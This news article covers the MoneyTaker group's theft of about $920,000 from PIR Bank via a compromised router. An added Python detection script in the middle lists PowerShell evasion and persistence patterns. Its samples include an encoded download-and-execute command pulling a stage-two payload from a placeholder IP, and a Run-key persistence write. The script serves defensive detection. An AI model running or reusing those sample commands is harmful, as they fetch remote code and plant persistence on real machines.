An infamous attacker group has stolen nearly a million dollars from Russia's PIR Bank after breaching the bank's network through an unpatched router.
The bank lost around $920,000 that had been held in its correspondent account at the Bank of Russia.
Group-IB, the Russian cyber-security firm called in to investigate, examined the affected servers and workstations and says it gathered "irrefutable digital evidence" that the MoneyTaker group was behind the attack.
MoneyTaker has previously been linked to thefts from banks and financial institutions in the US, UK and Russia dating back to 2016.
According to Group-IB's experts, MoneyTaker focuses on infiltrating inter-bank card-processing and funds-transfer systems such as the Automated Workstation Client of the Bank of Russia (AWS CBR) and the First Data STAR network.
Having compromised the router, the attackers used it to deliver malware into the bank's local network. They also relied on PowerShell scripts to maintain persistence and carry out their malicious operations, all while evading detection.
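The article does not say what the PowerShell scripts did, so the following is an added example rather than anything from the report or from Group-IB: a small triage routine of the kind a detection team would run over process-creation telemetry (Windows Security event 4688 with command-line auditing) to surface the pattern described above, namely PowerShell invoked with evasion switches, with a base64 -EncodedCommand payload, with in-memory download-and-execute, or with a persistence mechanism. The sample records, hostnames, paths and the 198.51.100.7 address are constructed for the example and are not from the PIR Bank incident.

```python
"""
Heuristic triage of PowerShell command lines for evasion, fileless execution
and persistence indicators. Added example; the sample records are constructed
and do not come from the PIR Bank incident or from Group-IB's report.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

SUSPICIOUS_THRESHOLD = 3  # a single evasion switch alone is not enough to alert

# Switches commonly used to keep a PowerShell launch quiet (weight 1 each).
EVASION_PATTERNS = {
    r"-nop(rofile)?\b": "no profile",
    r"-w(indowstyle)?\s+hidden": "hidden window",
    r"-e(xecutionpolicy|p)\s+bypass": "execution policy bypass",
    r"-noni(nteractive)?\b": "non-interactive",
}

# Cmdlets and registry paths commonly used to persist from PowerShell (weight 3).
PERSISTENCE_PATTERNS = {
    r"register-scheduledtask|schtasks(\.exe)?\s+/create": "scheduled task",
    r"currentversion\\run": "Run key",
    r"__eventfilter|commandlineeventconsumer|__filtertoconsumerbinding": "WMI subscription",
    r"new-service|\bsc(\.exe)?\s+create": "service install",
}

# Download-and-execute in memory, i.e. nothing written to disk (weight 3).
FILELESS_PATTERNS = {
    r"\b(iex|invoke-expression)\b[\s(]+.*(downloadstring|webclient|invoke-webrequest|\biwr\b)": "download-and-execute",
    r"frombase64string": "inline base64 decode",
}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


@dataclass
class Finding:
    command_line: str
    decoded: Optional[str] = None            # decoded -EncodedCommand payload, if any
    indicators: List[str] = field(default_factory=list)
    score: int = 0

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_THRESHOLD


def encode_command(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded(blob: str) -> Optional[str]:
    """Reverse encode_command; returns None if the blob is not valid base64/UTF-16LE."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:  # UTF-16LE needs an even byte count
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze(command_line: str) -> Finding:
    """Score one command line; the decoded payload is inspected alongside the outer command."""
    finding = Finding(command_line=command_line)
    text = command_line
    match = ENCODED_RE.search(command_line)
    if match:
        decoded = decode_encoded(match.group(1))
        if decoded is None:
            finding.indicators.append("encoded command (undecodable)")
        else:
            finding.decoded = decoded
            finding.indicators.append("encoded command")
            text = command_line + "\n" + decoded
        finding.score += 2
    lowered = text.lower()
    for patterns, weight in ((EVASION_PATTERNS, 1), (PERSISTENCE_PATTERNS, 3), (FILELESS_PATTERNS, 3)):
        for pattern, label in patterns.items():
            if label not in finding.indicators and re.search(pattern, lowered):
                finding.indicators.append(label)
                finding.score += weight
    return finding


def triage(records) -> List[Finding]:
    """Return findings for PowerShell process-creation records that cross the threshold."""
    results = []
    for rec in records:
        if not rec.get("image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
            continue
        finding = analyze(rec["command_line"])
        if finding.suspicious:
            results.append(finding)
    return results


# Constructed sample records modelled on event 4688 fields; not real telemetry.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_RECORDS = [
    {"host": "ws-014", "image": PS_IMAGE,
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"host": "ws-014", "image": PS_IMAGE,
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_command(
         "$wc = New-Object Net.WebClient; IEX $wc.DownloadString('http://198.51.100.7/stage2')")},
    {"host": "srv-aws-02", "image": PS_IMAGE,
     "command_line": r'powershell.exe -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Updater -Value C:\Users\Public\u.ps1"'},
    {"host": "srv-aws-02", "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"score={f.score} indicators={f.indicators}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

The routine keeps the weights deliberately simple: a lone -NoProfile is everyday administration and stays below the threshold, while an encoded command that decodes to a download-and-execute stub, or a Run-key write under -ExecutionPolicy Bypass, scores well above it. Decoding the -EncodedCommand argument before matching is the part that matters; base64 is exactly what lets such scripts slip past string-matching rules applied to the raw command line.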
Once inside the bank's main network, the attackers had full access to its AWS CBR accounts, the system through which the bank's financial transactions are controlled.
Using that system, the hackers transferred the money from PIR Bank's account at the Bank of Russia to 17 accounts they had created beforehand, and money mules withdrew the funds from ATMs across Russia shortly afterwards.
PIR Bank employees discovered the hack the following day, July 4th, but by then it was too late to reverse the transactions.
Ken Hosac, VP of IoT Strategy & Business Development at Cradlepoint, gave LHN the following exclusive comment:
“Software-defined Networking (SDN) enables IoT devices, such as routers, to be deployed on a completely separate network (virtually) that is invisible to the outside world. Traditional networks utilise a “connect first, authenticate second” model that allows hackers to scan networks for devices and their ports using common hacking tools. Those same hacking tools are then used to defeat the authentication. A key benefit of SDN is the model of “authenticate first, connect second”. These networks are completely invisible and inaccessible unless the organisation’s IoT devices are first properly authenticated. This means that it is much more difficult for routers to be exploited by hackers.”